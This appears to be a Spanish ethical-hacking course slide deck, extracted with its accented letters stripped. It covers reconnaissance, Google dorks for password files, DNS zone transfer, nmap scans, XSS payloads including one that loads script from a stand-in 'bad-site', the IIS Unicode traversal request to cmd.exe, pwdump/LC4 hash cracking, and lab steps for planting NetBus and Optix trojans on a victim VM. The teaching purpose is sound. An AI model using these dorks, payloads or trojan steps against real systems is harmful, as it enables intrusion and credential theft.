You are on page 1of 101

Tcnicas de Prevencin y

Ejecucin de Hacking
Prof. Reinaldo N. Mayol Arnao
Fases de un Ethical Hacking
El levantamiento comienza por:

1. Bsqueda del nombre de dominio
(empresa.com)

2. Localizacin fsica de la empresa, direcciones,
telfonos, direcciones de correo electrnico
Reconocimiento

3. Bsqueda sobre informacin de la empresa en google y
otros motores de bsqueda, blogs, noticias, foros, etc.
Bsqueda de versiones en pginas como www.archive.org

4. Bsqueda de Intranet, proyectos, versiones beta de la
empresa, conseguir acceso a la Intranet puede brindar
informacin valiosa de la misma.
Normalmente, se pueden inferir los sitios internos de las
empresas:intranet.empresa.com,beta.empresa.com,
www2.empresa.com, etc.
5. Existen herramientas como DNS Enumerator, Spider
Foot, DNS Stuff que te ayudan a realizar la busque
Reconocimiento
Prctica:Archive.org
Ambiente: Cualquiera

Vaya al sitio Web: www.archive.org,
utilice la herramienta para buscar
versiones anteriores de su sitio web.
Seccin Prctica
Seccin Prctica
As ramos el 21
Febrero del 2006
Seccin Prctica
Prctica:Archive.org
Ambiente: Cualquiera

Vaya al sitio Web: www.archive.org,
utilice la herramienta para buscar
versiones anteriores de su sitio web.
Seccin Prctica
Prctica:dnsstuff
Ambiente: Cualquiera


Seccin Prctica
Muchas aplicaciones mal instaladas, o instaladas por defecto, errores de
configuracin, etc, terminan publicando informacin que no debera ser publica
en Internet. Esta informacin es indexada por los buscadores y por lo tanto,
terminan siendo disponibles para el ethical hacker o para el criminal
informtico.

En particular, las capacidades avanzadas de bsqueda de google son
extraordinariamente flexibles. Las bsquedas comunes y corrientes contienen
texto a ser buscado en el cuerpo de la pgina Web.

Sin embargo, las bsquedas avanzadas pueden especificar tipos de archivos, textos
en distintas partes de la pgina no solo el cuerpo, patrones de nmeros, firmas
de aplicaciones, etc.

Algunos modificadores de este tipo son:
Inurl: Texto en el URL de la pagina.
Intext: Texto libre.
Site: Especifica un dominio.
Filetype: Tipo de archivos a buscar.
Google Hacking
Google Hacking
Obtener Cuentas:

inurl:account filetype:xls
Obtener passwords:

inurl:passwords filetype:xls
Obtener info sobre sistemas:

intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
Busqueda de dispositivos:

inurl:indexFrame.shtml Axis (WebCams)
intext:centreware inurl:status (Printers)

El sitio web donde todo esto ocurre se llama the Google Hacking Database:
http://johnny.ihackstuff.com/ghdb.php
Seccin Prctica:
Google Hacking
El google hacking esta muy bien para los hacks accidentales.

Es bastante obvio que cuando estamos tratando de evaluar un sitio en
especifico, es imposible probar todos los posibles google hacks junto con el
modificador site:dominio.tld. Por cierto, justamente esta idea esta detrs del
famoso scanner goolag desarrolaldo hace poco por el cDc.

A pesar de que hicieron esta idea impractica en realidad, lo que sucede al
ejecutarla es que google bloquea nuestro IP por gran numero de bsquedas.

Sin embargo, goolag esta incluido en el CD de herramientas porque no deja de
ser una excelente compilacin de google dorks.
Anlisis de Resultados:
Google Hacking
Instalar Goolag

Realizar un scan de unos cuantos google dorks para algn site externo.

Notar el nmero de scans antes de ser bloqueados.

* Es esto ilegal?
Notar la gran cantidad de google dorks recopilados.
Prctica Nmero 8:
Por supuesto, los atacantes tambin saben esto y es irreal pensar que esto sucede en el
mundo real. Lo que sucede en el mundo real es que informacin es recopilada de
una forma mucho mas deterministica.

En los tiempos de antes, el evaluador y el atacante se sentaran a revisar cada uno de
los resultados de sus sofisticadas bsquedas para interpretar la informacin y
decidir cual era relevante o importante para su proyecto. Esto ya no es as. La
evolucin del google Hacking se llama: Paterva.
Anlisis de Resultados:
Paterva Maltego
Maltego es un programa que es capaz de determinar relaciones entre personas y
enlaces del mundo real entre:

Gente
Grupos de gente (Social networks)
Compaas
Sitios Web
Infraestructura de Internet tales como
- Dominios
- Nombres DNS
- Netblocks
- Direcciones IP.
Frases
Afiliaciones
Archivos y documentos.
Estas entidades son relacionadas utilizando inteligencia artificial
Utilizar Maltego para ver que informacin pueden obtener sobre personas,
organizaciones, correos electrnicos, etc.


http://maltego1.paterva.com/maltego-classic.html
Seccin Prctica
Paterva Maltego
En este momento ya tenemos un buen nmero de herramientas para recopilar
informacin de nuestros objetivos.

A partir de todas las tcnicas anteriores debemos tener unos cuantos nombres
de dominio, rangos de direcciones IP, etc.
Tcnicas y herramientas de Hacking
Con estos pedazos de informacin es momento de
empezar a determinar puntos dbiles en concreto en
donde podamos ejecutar tcnicas especficas para
violar mecanismos de proteccin.

Si reflexionamos un poco sobre todo lo anterior, no se ha
violentado ninguna tecnologa, no se ha abusado de
ningn privilegio. Toda la informacin obtenida ha
sido recopilada por medios pblicamente disponibles.

El siguiente grupo de herramientas nos empieza a llevar a
una zona mas gris.
Ejecutar un ataque de transferencia de zona con nslookup.

nslookup
set type=NS
dominio.com
server servidordns.dominio.com
set type=any
ls d dominio.com

Todos los dominios bien configurados deben responder con un transaccin rehusada.
En caso contrario esta secuencia de comandos nos devuelve una lista de hosts con
sus nombres de acuerdo a los records del servidor DNS que fue preguntado.

Algunos servidores DNS tambin pueden responder con datos incorrectos para despistar
atacantes. Salvo casos muy especiales, las transferencias de zonas no deberan
permitirse a la internet en general.
Seccin Prctica:
Tcnica de Zone Transfer
En esta etapa el atacante intenta descubrir,
enumerar e inventariar los equipos de la red a la
que quiere acceder.
Especficamente, el atacante desea recolectar
informacin acerca de las direcciones IP, su
sistema operativo, la arquitectura de sistemas de
la vctima y los servicios que cada equipo de su
red est ejecuta.
Fase 2: Rastreo
Objetivo de la fase de rastreo
Un viejo amigo: NMAP
Tipo de rastreos de NMAP
Syn Stealth o Half Open:
Se enva un paquete SYN a un puerto del equipo, lo que
sugiere que se est solicitando una conexin, una
respuesta es esperada.
Si el puerto est abierto enviar un paquete SYN/ACK.
Por el contrario, si el puerto est cerrado enviar un
paquete RST.
La ventaja de este tipo de escaneo es que muy
pocos sitios registran este tipo de actividad.
Tipo de rastreos de NMAP
FIN Scan:
Slo funciona con equipos con TCP/IP desarrollado de
acuerdo al RFC 793, si se realiza con Windows la
respuesta ser que todos los puertos estn cerrados.

El escaneo consiste en enviar un FIN, si el puerto est
abierto se recibir NO RESPONSE...si el puerto est cerrado
se recibir un RST/ACK.
Tipo de rastreos de NMAP
NULL Scan:
Este tipo de rastreo slo funciona con equipos con
TCP/IP desarrollado de acuerdo al RFC 793. Si se
realiza con Windows la respuesta ser que todos los
puertos estn cerrados.

El escaneo consiste en enviar un paquete sin banderas
configuradas, si el puerto est abierto se recibir NO
RESPONSE...si el puerto est cerrado se recibir un
RST/ACK
Tipo de rastreos de NMAP
Window Scan:
Este rastreo es similar al ACK, la deteccin se realiza
revisando el tamao de las ventanas.

ICMP Echo Scan:
Esta opcin no es realmente un tipo de rastreo dado que
ICMP tiene abstraccin de puertos, pero es til para
determinar qu equipos de una red estn arriba haciendo ping.

List Scan:
Este tipo de escaneo simplemente genera e imprime la lista de
Ips/nombres sin hacer ping o escaneo de puerto. En realidad
se realiza una resolucin de nombres (DNS)
Tipo de rastreos de NMAP
Bounce Scan:
Este tipo de rastreo utiliza la vulnerabilidad de los
servidores FTP para los ataques de bounce. Esta
vulnerabilidad permite que una persona solicite al
servidor FTP abrir una conexin con un tercero en un
puerto en particular. Cmo el atacante puede utilizar el
FTP tambin podr recibir los resultados. El ataque
bounce es similar a la usurpacin de IP (IP Spoofing).
El anonimato del atacante se mantiene.
Tambin es bueno evadiendo cortafuegos y permite
acceso a redes locales.
Tipo de rastreos de NMAP

Reverse Ident Scan:
El protocolo Ident permite que se muestren los usuarios
dueos de procesos conectados va TCP, incluso si ese
proceso no comenz la conexin.

De esta forma una conexin puede establecerse por
HTTP y luego utilizar ident para identificar qu servidor
est corriendo como root.
Tipo de rastreos de NMAP
RPC Scan:
Este mtodo funciona en combinacin con otros tipos de
rastreos de puertos.
Funciona escaneando todos los puertos TCP/UDP y
luego los inunda con un programa de SunRPC con
comandos nulos en un intento de determinar si son
puertos RPC, si lo son, trata de determinar qu versin
tienen y programas estn sirviendo.
Tipo de rastreos de NMAP

Blaster Scan:
Este es un rastreo de puertos TCP sistemas para
basados en *nix.
Realiza ping a los equipos para determinar conectividad,
escanea segmentos de red, accesos annimos a
servidores FTP, vulnerabilidades CGI, POP3 y FTP (para
ataques de fuerza bruta).
Tipo de rastreos de NMAP
Otras opciones importantes: decoys
Cmo se detecta el sistema operativo?
Prctica:p0f
Ambiente: Linux

P0f es una herramienta para obtener informacin remota
sobre el sistema operativo y versiones de servidor de una mquina.
Su principal caracterstica es que no deja huella en los firewalls
y sistemas de deteccin de intrusos (a diferencia de ratreadores
de puertos activos como Nmap.)

1.Abra un shell en linux
2.Ejecute
p0f i <el nmero de interfaz de su tarjeta de red>
3.Abra un navegador (browser), observe los resultados.


Seccin Prctica
Prctica:Cheops
Ambiente: Linux

Cheops es una herramienta para sistemas linux que permite
deteccin de sistemas operativos, servicios activos en una
red, escaneo de puertos, etc..

1.Abra un shell
2.Ejecute la herramienta ( simplemente ejecute el comando cheops)


Seccin Prctica
Cheops
Otro camino comn utilizado en esta etapa es la
bsqueda de vulnerabilidades que puedan ser
explotables.
Existen innumerables herramientas que pueden ser
utilizadas para este fin.
Bsqueda de Vulnerabilidades
Proxy: es un servidor que puede ser utilizado
cmo intermediario para conexiones con otros
equipos.
Es comn utilizar servidores distribuidos por
varios pases de forma es esconder el origen real
de la intrusin.

Escondindose
Buscando free Proxy Servers
Tor es una de las herramientas de proxy-socks mas
conocidas y utilizadas.
Funciona re-direccionando todo el trfico a un servidor
annimo y cifrando los datos entre ese servidor tor y el
cliente ( no entre el servidor tor y el destino)
TOR
TOR en accin
TOReando
El trmino enumeracin se emplea para designar el proceso de
extraccin de cuentas de usuario, privilegios de las cuentas,
nombres de equipo, etc.

Algunas tcnicas de enumeracin para la extraccin de usuarios:

1. W2K
2. SNMP
3. Utilizando los IDs de correo electrnico
4. Extrayendo informacin con usuarios por omisin
5. Fuerza bruta contra directorio activo.
Enumerando
Ejecute el programa Getacct ( get account) contra el
sistema vctima de su red.


Prctica: getacc
Ambiente: Windows

Seccin Prctica
Las sesiones nulas toman ventaja de una vulnerabilidad en
el CIFS/SMP (Common Internet File System/Server
Messaging Block).
Se puede establecer una sesin nula con un equipo de
Windows /(NT/2000), con un usuario nulo y su password.

Utilizando una sesin nula se puede recabar informacin
sobre el equipo como:

Lista de usuarios y grupos
Lista de equipos
Lista de servicios compartidos
Usuarios y SIDs (Security Identifier)
NULL Sesion
Luego de lograr el acceso el hacker tratar de
escalar privilegios y ejecutar aplicaciones o
exploits de forma encubierta.

Una forma comn de encubrimiento son los
rootkits. Los rootkits se instalan en el kernel y
tienen la habilidad de esconderse y encubrir sus
actividades.
Fase 3: Toma de Control

Cuando se instala un rootkit se reemplazan llamados
del sistema operativo por versiones o rutinas
modificadas que contienen la ejecucin de script o
aplicacin adicional al llamado natural que realiza la
funcin.

Un rootkit puede: Esconder procesos, archivos,
entradas en el registro interceptar comandos, solicitar
debug (causando los famosos pantallazos azules),
redirigir archivos .
Fase 3: Toma de Control
Por qu son comprometidos los sitios Web?
Obtencin de identidades mediante ataques de
hombre en el medio.
Envenenamiento del Cache del DNS.
Explotando errores de los programas.
Explotando configuraciones incorrectas.
Envenenamiento de URL
Inyecciones SQL
DoS


Cmo son comprometidos?
(entre muchas causas)
Cross-Site Scripting
En HTML, existen caracteres especiales, que se
utilizan para que el servidor y los navegadores puedan
diferenciar entre texto normal ( mostrado) y elementos
que proporcionan diferentes funcionalidades.
Cross-Site Scripting es una vulnerabilidad que puede ser
explotada mediante la insercin de caracteres especiales
en la comunicacin cliente-servidor, en forma de scripts,
contentivo de cdigo malicioso.

Algunos ejemplos
<A HREF= http://sitio.com/comment.cgi?
mycomment=<SCRIPT>codigo-malicioso</SCRIPT>">
Click here</A>

<A HREF= http://sitio.com/comment.cgi?
mycomment=<SCRIPT SRC=http://bad-site/badfile'>
</SCRIPT>"> Click here</A>


Cross-Site Scripting, ejemplos
Imagine que ud. Ha recibido un correo electrnico
con una invitacin a un paseo. Para ir al paseo,
ud. debe llenar un formulario con sus datos.
El email tiene un link que amablemente lo llevar
al formulario.
El link tiene la forma
http://www.elpaseosoado.com
El cdigo del link dice:
www.victima.com/default.asp?name=<script>evilScript()</script>
Una situacin real
Usuario Confiado
Server Vulnerable
Usuario Enva Solicitud
Server Devuelve HTML con cdigo
malicioso incluido ( el server cree que es el
nombre del usuario)
Usuario confiado pierde el
Control de su mquina, el cdigo malicioso
Se lo ha entregado a un extrao
Que sucede
Esta vulnerabilidad permite a usuarios externos obtener
acceso a mquinas corriendo IIS 4.0 o IIS 5.0 a travs de
URLs malformadas
Ej:
Microsoft IIS efecta una verificacin de seguridad sobre cada
CGI URL ejecutado para asegurar que el requerimiento no use
ninguna secuencia ../
Pero..
Dado que la codificacin Unicode del caracter / es %c0%af, si
se reemplaza la secuencia ../ por ..%c0%af este no ser
rechazado por la verificacin inicial, ya que dicho proceso no
encuentra ninguna ocurrencia de los caracteres ../ slo ver una
secuencia ..%c0%af vlida.

GET/scripts/..%c0%af/winnt/system32/cmd.exe?/
c+dir=c:\ HTTP/1.0
Web Server Folder Transversal Vulnerability
%c0 es el cdigo de la tabla Basic Latin

El nmero
ms grande
es %7f ( 127
D)
Pero, %af > %7f, lo
Que significa que el sistema
da la vuelta ,%80-%af=%2f
%2
F
Por qu %c0%at?
RPC DCOM
RPC (Remote Procedure Call o Llamada de
Procedimiento Remoto), es un protocolo utilizado por
Windows, que proporciona un mecanismo de
comunicacin entre procesos internos, y que permite que
un programa ejecutndose en una computadora pueda
acceder a los servicios de otra, de manera transparente
para el usuario
Otras vulnerabilidades famosas
Windows posee un servicio llamado DCOM (Distributed
Component Object Model o Modelo de Objeto
Componente Distribuido), que permite a los objetos
COM comunicarse entre a travs de la red.
Un atacante puede utilizar los puertos TCP/UDP 135
(RPC), 139 y 445 (NetBIOS), 593 (RPC/http), o cualquier
puerto habilitado por IIS para alcanzar los servicios
DCOM vulnerables.
Otras vulnerabilidades famosas
Existen innumerables vulnerabilidades descritas y
explotables utilizando los servicios DCOM.

Un atacante que tenga xito en aprovecharse de
estas vulnerabilidades, podra ejecutar un cdigo
capaz de tener todos los privilegios del sistema
local de un sistema afectado.
Otras vulnerabilidades famosas
Prctica: RPC Exploit-GUI
Ambiente: MS. Windows
1-Ejecute la Herramienta RPC
E-Gui que le entregar el
instructor.
2-Localice a la vctima de su
ataque.
3- Ejecute el ataque. (SLO
UNA VEZ)
4- Evale la consecuencias del
mismo.
Seccin Prctica
reinaldo@guije:~$ echo -e "GET / HTTP/1.0\n\n" | nc -vv
www.XXXXXXX.COM 80
XXXXXXX.com.ve [XXX.XXX.XXX.116] 80 (www)
open
HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 02:21:22 GMT
Server: Apache/2.0.53 (Ubuntu) PHP/4.3.10-10ubuntu4.3
X-Powered-By: PHP/4.3.10-10ubuntu4.3
Connection: close
Content-Type: text/html

Robo de Contraseas
Autenticacin
El modelo ms comn de autenticacin permite identificar a un
usuario, una aplicacin o a un servicio utilizando una pareja de ID-
Clave

En un contexto ms amplio existen varios modelos adicionales de
autenticacin:
Kerberos
Certificacin Digital

Esquemas de Autenticacin
Autenticacin HTTP
AutenticacinBasica
Digest Autenticacin
Autenticacin Windows (NTLM)
Autenticacin con Certificados Digitales o Claves
RSA Secure Token
Biometra

Autenticacin HTML Bsica
Digest Authentication
La contrasea no se utiliza directamente en la autenticacin, sino, por
ejemplo:
HA1 = MD5 (nombre de usuario: entorno: contrasea).
Se basa en el esquema reto- respuesta


Digest Authentication
Servidor de
Autenticacin
Servidor Enva Reto
Usuario
Cifra
Reto con
Clave
Usuario enva Reto Cifrado
Servidor
compara reto
enviado con
reto recibido
Cliente
LA CLAVE NUNCA PASA POR LA
RED!!
Autenticacin NTLM
Constituye una variante de la autenticacin mediante resmenes
criptogrficos.
Se trata igualmente una forma segura de autenticacin en la medida
en que no se envan ni la contrasea ni el nombre de usuario a travs
de la red.
Slo est soportado por Microsoft Internet Explorer, versin 2.0 o
posterior y servidores NT.
No funciona para conexiones con proxy.

Cmo ocurre la autenticacin en redes Microsoft?
Cuando un usuario enva la orden para acceder a
\\maquina\recurso_compartido se efectan los siguientes pasos:

Establecimiento de sesin TCP
Establecimiento de sesin NetBIOS
Negociacin SMB (Server Message Block)
Autenticacin Challenge-Response

SMB
SMB (Server Message Block) es el protocolo a nivel
capa Aplicacin usado en las redes Microsoft.
Por razones de compatibilidad, los nuevos
sistemas operativos siempre comprenden a los
anteriores.
Durante la negociacin el cliente enva la lista de
dialectos que comprende, el server selecciona uno
en comn (normalmente el ms nuevo) y devuelve
esa informacin al cliente.
Conjuntamente con esa informacin el servidor
enva el reto.
Kerberos
El servidor de Kerberos en Windows 2000 es un
Controlador de Dominio. Todos los controladores
de dominio Windows 2000 proveen el servicio
Kerberos a la red.

Kerberos est basado en la tcnica de Secreto-
Compartido.
Si tanto cliente, como usuario y como server,
tienen cuenta en el dominio hay un secreto-
compartido entre cada uno de ellos y el
Controlador de Dominio.
Kerberos
Autenticacin basada en Claves y Certificados
Ej. de extensiones
75
SSL
76
|
D.Hellman
Usando
C. Asimtrica
C.Simetrica
Prctica: PWDUMP, LC4
Ambiente: MS. Windows
LOS ELEMENTOS AQU PLANTADOS SON SLO UNA
PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS
CON OTROS FINES.
Seccin Prctica
PWDump
Ejecute la herramienta en lnea
de comando en su equipo.
Ejecute:
pwdump ip_del_equipo
ruta_de_archivo id
Cuando la herramienta le indique
completed busque en el sitio
donde guardo el archivo. En el
archivo tendr un listado de
usuarios y un campo dnde podr
visualizar el hash del password.
Utilice LC4
Una vez que ejecute la
herramienta importe el archivo
.txt que realizo con el pwdump
Ejecute la opcin begin audit y
podr descifrar el password
DoS
Tipos Generales

"flood"
Man-in-the-middle
Block Users
Block Services
Como se inicia un DoS?
Se comienza un ataque de DoS explotando una vulnerabilidad en un
sistema informtico.
Es del sistema principal que el intruso identifica y se comunica con
otros sistemas que puedan ser comprometidos.
La idea detrs de un ataque de este tipo es dejar fuera al sistema
vctima, principalmente por inanicin de recursos.
La principal dificultad radica en detener el ataque y reconocer las
solicitudes apcrifas de las verdaderas.
Algunos Ataques de DoS
SYN flood
TCP FIN flood
Connection flood
Land Atack
finger bomb
email bomb
MAC flooding
DNS flood
Supernuke/Winnuke
Teardrop/Newtear
Paquetes fragmentados
Bucle UDP/Snork UDP
Tipos de Ataques
DoS : Ataque Individual de Negacin de Servicios
DdoS: Ataque Distribuido de Negacin de Servicios.
DoS y DDoS
Ping de la Muerte
A atacante deliberadamente enva datagramas IP mayores de los 64 KB
permitidos por el protocolo IP.
El proceso de fragmentacin hace que el paquete sea picado en
fragmentos. Cada fragmento su vez puede tener hasta 64 KB
El sistema operativo vulnerable no es capaz de manejar la situacin y
falla.
Smurf

Enviar un paquete ICMP-Echo-Request a unSMURF amplifier network (A-
class broadcast address).
Todos los ordenadores de esa red responden a la direccin de origen
Qu es un Troyano?
Un Troyano es un pequeo programa que corre a escondidas y que infecta
a un computador.
Con la ayuda de un Troyano, un atacante puede obtener acceso a
passwords, modificar parmetros de operacin de la computadora
infectada, etc.


Tipos de Troyanos
Security Software Disablers
Destructive
Remote Access
Data-Sending
Denial-of-Service (DoS) Attack
Proxy



Puertos utilizados por (algunos)
troyanos
Back Orifice 31337-38 /UDP
Deep Throat 2140, 3150/UDP
NetBus 12345,12346/TCP
NetBus 2 Pro 20034/TCP
Back Orifice 31337-38 /UDP
Prctica: NetBUS
Ambiente: MS. Windows
LOS ELEMENTOS AQU PLANTADOS SON SLO UNA PRUEBA DE
CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES.
Seccin Prcticas
NetBUS
El instructor le entregar una mquina virtual a la que
llamaremos vctima.
En la mquina atacante , la suya, encontrar un carpeta
llamanda netbus.
Existen 2 archivos importantes: NetBUS.exe (CLIENTE, Ud.) y
PATH. Exe ( SERVIDOR, su vctima) NO EJECUTE PATH EN SU
MAQUINA!!!!
Enve el archivo path.exe a la mquina vctima, espere a que
se ejecute.
Ahora ejecute ud. netbus y ponga la IP de su vctima.
NetBus
Prctica: Optix
Ambiente: MS. Windows
LOS ELEMENTOS AQU PLANTADOS SON SLO UNA PRUEBA DE
CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES.
Seccin Prcticas
Optix
Con optix, construiremos tanto un cliente como un servidor, al igual
que con el netbus abra que hacer llegar una parte a la vctima.
CUIDADO!!! NO CORRA EL PROGRAMA QUE CONTRUYA CON BUILDER EN
SU PROPIA MAQUINA O LA INFECTAR
Optix: Builder
Optix: Builder
Luego de
elegir las
opciones que
desee,
construya el
troyano.
RECUERDE NO EJECUTAR EL PROGRAMA CREADO EN
SU MAQUINA
Optix: Client
RECUERDE...
Las anteriores demostraciones slo tienen
como objetivo probar conceptos, no las utilice
en otras situaciones o podra incurrir en delitos
Prctica: Super Helper Tool
Ambiente: MS. Windows
Esta es una herramienta que permite verificar los procesos que estn
corriendo de manera independiente al sistema operativo, detectar y
detener troyanos y virus.
Seccin Prcticas
NetBUS
Prctica: xxxxxxxxxxx
Ambiente: xxxx
LOS ELEMENTOS AQU PLANTADOS SON SLO UNA
PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS
CON OTROS FINES.
Presione simultneamente las
teclas WINDOWS y R en la
mquina virtual que hemos
utilizado de atacante.

Sorprendido?
Seccin Prcticas

You might also like